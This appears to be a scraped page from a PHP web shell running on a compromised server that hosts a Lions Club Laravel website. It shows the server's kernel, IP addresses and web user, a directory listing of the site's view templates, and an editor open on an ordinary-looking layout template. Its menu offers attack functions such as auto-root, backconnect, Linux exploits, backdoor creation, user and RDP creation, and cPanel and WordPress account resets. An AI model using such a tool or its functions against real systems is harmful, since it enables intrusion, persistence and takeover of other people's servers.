Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.217.209.151
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
resources /
views /
frontEnd /
[ HOME SHELL ]
Name
Size
Permission
Action
home
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
abode.blade.php
7.59
KB
-rwxr-xr-x
contact.blade.php
22.5
KB
-rw-r--r--
districtdirectory.blade.php
13.33
KB
-rwxr-xr-x
exe_officer_isame.blade.php
5.2
KB
-rw-r--r--
gat.blade.php
7.75
KB
-rwxr-xr-x
home.blade.php
36.94
KB
-rw-r--r--
indiadirectory.blade.php
7.91
KB
-rwxr-xr-x
indiaid.blade.php
7.55
KB
-rwxr-xr-x
indialeaders.blade.php
3.2
KB
-rwxr-xr-x
indiapid.blade.php
7.58
KB
-rwxr-xr-x
internationaldirectory.blade.p...
8.6
KB
-rwxr-xr-x
isame.blade.php
7.58
KB
-rwxr-xr-x
isamecontact.blade.php
5.61
KB
-rwxr-xr-x
layout.blade.php
2.58
KB
-rw-r--r--
lci.blade.php
5.2
KB
-rwxr-xr-x
lcif.blade.php
7.79
KB
-rwxr-xr-x
lionspages.blade.php
512
B
-rw-r--r--
member.blade.php
14.93
KB
-rwxr-xr-x
showAllCouncilCP.blade.php
3.49
KB
-rwxr-xr-x
showAlldisctrictgov.blade.php
3.99
KB
-rwxr-xr-x
showAllfirstdistrictgov.blade....
3.91
KB
-rwxr-xr-x
showAllseconddistrictgov.blade...
4.03
KB
-rwxr-xr-x
sitemap.blade.php
365
B
-rw-r--r--
subdistrict.blade.php
5.92
KB
-rwxr-xr-x
table.blade.php
22.77
KB
-rw-r--r--
topic.blade.php
66.05
KB
-rw-r--r--
topics.blade.php
40.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : layout.blade.php
<!DOCTYPE html> <html lang="{{ @Helper::currentLanguage()->code }}" dir="{{ @Helper::currentLanguage()->direction }}"> <head> @include('frontEnd.includes.head') @include('frontEnd.includes.colors') </head> <?php use App\Helpers\Helper; ?> <?php $bdy_class = ""; $bdy_bg_color = ""; $bdy_bg_image = ""; if (Helper::GeneralSiteSettings("style_type")) { $bdy_class = "boxed-layout"; if (Helper::GeneralSiteSettings("style_bg_type") == 0) { $bdy_bg_color = "background-color: #000;"; if (Helper::GeneralSiteSettings("style_bg_color") != "") { $bdy_bg_color = "background-attachment: fixed;background-color: " . Helper::GeneralSiteSettings("style_bg_color") . ";"; } $bdy_bg_image = ""; } elseif (Helper::GeneralSiteSettings("style_bg_type") == 1) { $bdy_bg_color = ""; $bdy_bg_image = "background-attachment: fixed;background-image:url(" . URL::to('uploads/pattern/' . Helper::GeneralSiteSettings("style_bg_pattern")) . ")"; } elseif (Helper::GeneralSiteSettings("style_bg_type") == 2) { $bdy_bg_color = ""; $bdy_bg_image = "background-attachment: fixed;background-image:url(" . URL::to('uploads/settings/' . Helper::GeneralSiteSettings("style_bg_image")) . ")"; } } ?> <body class="js {!! $bdy_class !!}" style=" {!! $bdy_bg_color !!} {!! $bdy_bg_image !!}"> <div id="wrapper"> <!-- start header --> @include('frontEnd.includes.header') <!-- end header --> <!-- Content Section --> <div class="contents"> @yield('content') </div> <!-- end of Content Section --> <!-- start footer --> @include('frontEnd.includes.footer') <!-- end footer --> </div> @include('frontEnd.includes.foot') @yield('footerInclude') @if(Helper::GeneralSiteSettings("style_preload")) <div id="preloader"></div> <script type="text/javascript"> jQuery(document).ready(function ($) { $(window).load(function () { $('#preloader').fadeOut('slow', function () { // $(this).remove(); }); }); }); </script> @endif @if(Helper::GeneralSiteSettings("style_header")) <script type="text/javascript"> window.onscroll = function () { myFunction() }; var header = document.getElementsByTagName("header")[0]; var sticky = header.offsetTop; function myFunction() { if (window.pageYOffset >= sticky) { header.classList.add("sticky"); } else { header.classList.remove("sticky"); } } </script> @endif </body> </html>
Close